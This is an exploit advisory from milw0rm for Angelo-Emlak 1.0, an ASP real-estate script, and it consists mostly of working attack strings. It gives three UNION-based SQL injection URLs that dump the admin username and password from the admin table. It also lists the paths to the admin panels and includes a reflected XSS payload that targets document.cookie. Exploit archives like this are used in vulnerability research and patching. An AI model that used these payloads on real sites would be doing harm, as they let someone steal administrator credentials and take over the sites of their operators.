Angelo-Emlak 1.0 - Multiple Remote SQL injection Vulnerabilities

                                                Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable


Discovered By : U238

msn              :setuid.noexec0x1[+]hotmail[-].com


webPage     :http://noexec.blogspot.com



Script        : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)


Script2       : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html



not   : Siz0yyffyeniz biz kardesim inkar edenmı var ya  :(   - Allah .belanı versin ulan $iz0 .buda yılın sozu :D


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

Exploit:


http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1


----------

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin

---------

Admin Panel : 

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/default.asp

X13 DB Editor Admin Panel : 

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/admin


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_


This script is xss vulnerable ! ..

Exploit : 


target/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS]

"><script>alert(document.cookie)</script>&olay=insert


----------------------------------------------------

My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz - Sersak - ZeberuS

U238 | Web - Designer Solutions Developer

# milw0rm.com [2008-04-26]